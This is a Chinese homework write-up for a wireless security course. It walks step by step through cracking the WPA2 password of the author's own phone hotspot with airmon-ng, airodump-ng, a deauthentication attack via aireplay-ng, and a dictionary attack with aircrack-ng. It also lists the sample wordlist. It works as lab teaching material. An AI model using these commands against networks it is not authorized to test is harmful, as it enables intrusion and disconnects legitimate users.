窥间伺隙:Aircrack 套件破解 WPA2 密码

目录
《无线网络安全》作业。梦回大一。
准备工作 #
手机开启热点,设置弱密码 merc123321,热点 SSID 为 nova 4。物理机连接 nova 4 无线网络作为被害主机。

为 Kali 虚拟机添加无线网卡,随后即可在 ifconfig 的输出中看到 wlan0 网卡:

首先启动监听:
$ sudo airmon-ng start wlan0
结果如图:

此时 ifconfig 可以看到 wlan0mon 监听网卡:

随后扫描无线网络:
$ sudo airodump-ng wlan0mon
结果如图,可以看到 nova 4 网络的 BSSID 为 D8:9B:3B:9E:AB:A9。

利用该 BSSID 过滤掉其余网络流量:
$ sudo airodump-ng -c 11 --bssid D8:9B:3B:9E:AB:A9 -w psk wlan0mon
结果如图:

捕获 WPA 握手包 #
此时我们需要捕获到 WPA 握手包,因此可以攻击一个已经连接到该网络的主机(即我们的物理机),让它强制掉线并重连产生握手包。
首先查看被害主机 MAC 地址:

可以看到 MAC 地址为 F4:8C:50:9F:E5:43。实际上,在前面 airodump-ng 时的界面中也可以直接看到连接了该网络的主机 MAC 地址。随后发送 DeAuth 包使其掉线:
$ sudo aireplay-ng -0 1 -a D8:9B:3B:9E:AB:A9 -c F4:8C:50:9F:E5:43 wlan0mon
出现 WPA handshake 即捕获到了握手包,可以停止捕获了。

口令破解 #
此时在目录下会生成 psk-01.cap ,我们使用 aircrack-ng 进行口令破解:
$ sudo aircrack-ng -w password.lst -b D8:9B:3B:9E:AB:A9 psk*.cap
使用的字典中包含了 merc123321 这个真正的密码:
$ cat password.lst
merc123
merc1234
merc123456
123merc
1234merc
123456merc
merc123321
merc321123
最后即可成功破解:
